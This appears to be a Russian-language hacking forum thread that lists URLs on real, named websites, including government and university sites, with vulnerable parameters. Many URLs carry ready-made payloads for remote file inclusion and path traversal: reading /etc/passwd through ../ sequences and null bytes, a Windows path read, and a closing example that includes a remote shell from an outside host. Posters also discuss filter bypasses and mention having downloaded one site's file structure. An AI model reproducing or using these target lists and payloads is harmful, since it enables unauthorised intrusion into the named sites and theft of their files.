http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=
http://www.nutribiotic.com/wwwstat.html//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://www.xshqiptaretx.org/strings.php/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
http://www.isrchnkd.com/srchnkd/fclick-show.php/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?c=
http://www.orientaredstgonorte.cl/estadisticas/full.php//config.inc.php?path_escape=
http://www.nutribiotic.com/wwwstat.html//config.inc.php?path_escape=
http://www.vaccinazione.it/cgi-bin/awstats.pl/oneadmin/new...s.pl?output=notfounderror//config.inc.php?path_escape=
http://www.backupzone.org/stats/awstats.pl?output=errors404//config.inc.php?path_escape=
http://www.xshqiptaretx.org/index.php?page=
http://www.lehicity.com/index.php?dept=
http://www.xshqiptaretx.org/index.php?dept=
http://www.xshqiptaretx.org/index.php?dsp=
http://www.si-bastogne.be/index.php?lg=
http://www.berloz.be/index.php?lg=
http://www.xshqiptaretx.org/index.php?inhalt=
http://www.xshqiptaretx.org/index.php?ort=
http://www.xshqiptaretx.org/index.php?dsp=
http://www.xshqiptaretx.org/index.php?pilih=
http://www.xshqiptaretx.org/index.php?place=
http://www.xshqiptaretx.org/index.php?dept=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?pilih=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?dept=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?dsp=
http://www.boatersworld.com/product/source/mod/rss/post.php?Codebase=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?dsp=
http://www.infernet-x.com/index.php?dsp=
http://www.xshqiptaretx.org/index.php?inhalt=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?dsp=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?lg=
http://www.infernet-x.com/index.php?pilih=

_http://powermpg.flash-k.com/index.php?/etc/passwd

http://www.raiseyourpulse.com/reports/log.files.html/index.php?arquivo=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?arquivo=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.backupzone.org/stats/awstats.pl?output=errors404/index.php?rage=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?nic=
http://www.backupzone.org/stats/awstats.pl?output=errors404/index.php?rage=
http://www.infernet-x.com/index.php?rage=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.infernet-x.com/index.php?rage=
http://www.backupzone.org/stats/awstats.pl?output=errors404/index.php?rage=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.control.com.co/estadisticas/zoek.php/index.php?x=
http://www.infernet-x.com/index.php?rage=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?nic=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.infernet-x.com/index.php?arquivo=
http://www.infernet-x.com/index.php?arquivo=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?nic=
http://www.infernet-x.com/index.php?arquivo=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?nic=
http://www.infernet-x.com/index.php?nic=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?nic=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://www.control.com.co/estadisticas/full.php/index.php?x=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?nic=
http://www.aquaprek.ru/eng_version/index.php?inc=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://www.infernet-x.com/index.php?nic=
http://www.control.com.co/estadisticas/full.php/index.php?x=
http://www.infernet-x.com/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?x=
http://www.control.com.co/estadisticas/full.php/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?x=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?arquivo=
http://www.vaccinazione.it/cgi-bin/awstats.pl?output=notfounderror/index.php?arquivo=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/index.php?x=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/index.php?x=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.xshqiptaretx.org/strings.php/index.php?x=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?rage=
http://www.infernet-x.com/index.php?arquivo=
http://www.backupzone.org/stats/awstats.pl?lang=fr&output=errors404/index.php?rage=
http://www.infernet-x.com/index.php?rage=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.vaccinazione.it/cgi-bin/awstats.pl?output=notfounderror/index.php?nic=
http://www.infernet-x.com/index.php?nic=
http://www.infernet-x.com/index.php?x=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=nl&output=notfounderror&update=1/index.php?x=
http://www.xshqiptaretx.org/strings.php//functions.php?include_path=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/htmltonuke.php?filnavn=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/htmltonuke.php?filnavn=
http://www.xshqiptaretx.org/strings.php/htmltonuke.php?filnavn=
http://lupoland.homeip.net/cgi-bin/awstats.pl?output=errors404%E2%8C%A9=nl//modules/TotalCalendar/about.php?inc_dir=
http://www.xshqiptaretx.org/SHELLZ.php/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
http://www.control.com.co/estadisticas/full.php//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
http://www.vaccinazione.it/cgi-bin/awstats.pl?output=notfounderror%E2%8C%A9=en//ws/login.php?noSet=0&includedir=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror&update=1//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://www.backupzone.org/stats/awstats.pl?output=errors404//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://lupoland.homeip.net/cgi-bin/awstats.pl?output=errors404%E2%8C%A9=nl//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror&update=1/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=
http://www.gymzv.sk/~aladar/vypis_statis.php/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=
http://www.nutribiotic.com/wwwstat.html//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://www.xshqiptaretx.org/strings.php/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
http://www.isrchnkd.com/srchnkd/fclick-show.php/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?c=
http://www.orientaredstgonorte.cl/estadisticas/full.php//config.inc.php?path_escape=
http://www.nutribiotic.com/wwwstat.html//config.inc.php?path_escape=
http://www.vaccinazione.it/cgi-bin/awstats.pl/oneadmin/new...s.pl?output=notfounderror//config.inc.php?path_escape=
http://www.backupzone.org/stats/awstats.pl?output=errors404//config.inc.php?path_escape=
http://www.xshqiptaretx.org/index.php?page=
http://www.lehicity.com/index.php?dept=
http://www.xshqiptaretx.org/index.php?dept=
http://www.xshqiptaretx.org/index.php?dsp=
http://www.si-bastogne.be/index.php?lg=
http://www.berloz.be/index.php?lg=
http://www.xshqiptaretx.org/index.php?inhalt=
http://www.xshqiptaretx.org/index.php?ort=
http://www.xshqiptaretx.org/index.php?dsp=
http://www.xshqiptaretx.org/index.php?pilih=
http://www.xshqiptaretx.org/index.php?place=
http://www.xshqiptaretx.org/index.php?dept=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?pilih=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?dept=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?dsp=
http://www.boatersworld.com/product/source/mod/rss/post.php?Codebase=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?dsp=
http://www.infernet-x.com/index.php?dsp=
http://www.xshqiptaretx.org/index.php?inhalt=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?dsp=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?lg=
http://www.infernet-x.com/index.php?pilih=
ты давно их чекал?
я проверил свыше десяти ссылка ни одна не актуальна

http://students.missouri.edu/~bluephi/loader.php?p=/etc/passwd
http://www.kneuro.net/jkforth/index.php?file=/etc/passwd
http://madscientist.termisoc.org/index.php?page=/etc/passwd
http://www.gooddogcollage.com/index.php?page=/etc/passwd
http://www.hairinhollywood.net/index.php?page=/etc/passwd
http://www.windshieldpro.ca/main3.php?page=/etc/passwd
http://www.electrad.ca/en/Main.php?page=/etc/passwd
http://www.colibri-ie.com/index.php?page=/etc/passwd
http://yahg.sourceforge.net/index.php?page=/etc/passwd
http://www.typs.com/home/main.php?page=/etc/passwd
http://www.kerryjohnson.com/index12.php?page=/etc/passwd
http://landofdarkness.net/index.php?page=/etc/passwd
http://www.dittberner.com/news/read.php?file=/etc/passwd
http://whitmanforgilpin.com/speeches/view.php?file=/etc/passwd

http://www.ccbtools.com/support/index.php?include_file=../../../../../etc/passwd

http://www.gregf.org/dotfiles/show_file?file=../../../../../../etc/passwd

http://www.clan-webs.net/zone/index.php?include_file=../../../../../../etc/passwd

http://minipc.org/safepup/index.php?file=../../../../../../../../../../../../etc/passwd

_http://www.preko.kz/articles.php?a=../../../../etc/passwd

www.seeui.co.kr

http://www.seeui.co.kr/down.php?mode=1&fn=[LOCAL_FILE]

Удалось выкачать маленькую структуру сайта. Дальше копать было лень ;)

Сайт: http://uafile.com/857198

_http://www.littlewoodscasino.com/online-casino/affiliates/review.php?review=../../../../../../../../etc/passwd

pr 4
http://www.fonprevial.org.co/download.php?file=../../../../../../../../../../../etc/passwd

тупое читалко
https://secure4.olemiss.edu/umpolicyopen/GetPdfActive?pol=10967301&ver=active&file=../../../../../../../../../../../etc/passwd%00.pdf

http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows

можно передвигаться по всему компу ...
PS:Сайт в локалке,но можно в него и с инета зайти
Это похоже не PHP инъекцмя

http://www.jfrealtors.com/index.php?page=../../../../etc/passwd
Все в открытую)
http://darryl-e.com/pagegen.php?page=[ url ]
http://www.grammi.edu.gr/gr/index.php?page=[ url ]

http://www.grammi.edu.gr/gr/index.php?page=[ url ]
это не инекция
оно просто вставляет во фрейм

gov, pr9

http://www.mbda.gov/?section_id=12&bucket_id=916&content_id=6204&well=entire_page&textsize=Medium&method=printer&portal_document_download=true
&download_cid=6204&name=../../../../../../../../../etc/passwd&legacy_flag=false


gov, pr7

http://www.mass.gov/?pageID=mg2subtopic&L=4&L0=../../../../../../../../../etc/passwd%00&L1=Resident&L2=Housing
&L3=Buying+a+Home&sid=massgov2

http://zwgkml.harbin.gov.cn/hrb_zwgkml/file.php?filename=../../../../../../../../../../../etc/passwd
Читалко
http://www.factordinero.com.co/docs/download.php?file=download.php

http://www.uaemet.gov.ae/upload/filedownload_backend.php?file=../../../../../../../../../../../etc/passwd
http://www.telcat-starclub.de/cgi-bin/parse.pl?file=../../../../../../../../../../../etc/passwd
http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd

liveinternet.ru
Po vsem priznakam est' includ, jal' 4to nastroika servera ne pozvolaet vospol'zovat's9 dannoj bagoj
http://www.liveinternet.ru/stat/index.html?lang=./././en

ну вот смотри:

пишем:
http://www.liveinternet.ru/stat/index.html?lang=./././en
и видим вверху справа:
{currentName} Русский
вверху слева:

LiveInternet • site statistics
на английском языке.


теперь пишем так:
http://www.liveinternet.ru/stat/index.html?lang=./././en./././

это на случай, если ./ вырезается.
Видим. что язык стал русским - значит - по дефолту - произошла ошибка.

Если пишешь ./././ до имени (ну типа точка - текущий каталог) - ошибки нет


пишем:

http://www.liveinternet.ru/stat/index.html?lang=./././es

и язык испанский.

А эксплуатировать не удастся потому, что нуль-байт фильтруется, а в конце есть приставка. И в начале тоже. То есть есть возможность подключать (или читать) файлы с тем расширением, с каким и файлы с языками

"Работница" - журнал для семейного чтения


Уязвимый код в файле part.php:
include($rubr.".php");
Использование:
http://www.rabotnitsa.ru/part.php?rubr=http://www.yoursite.com/shell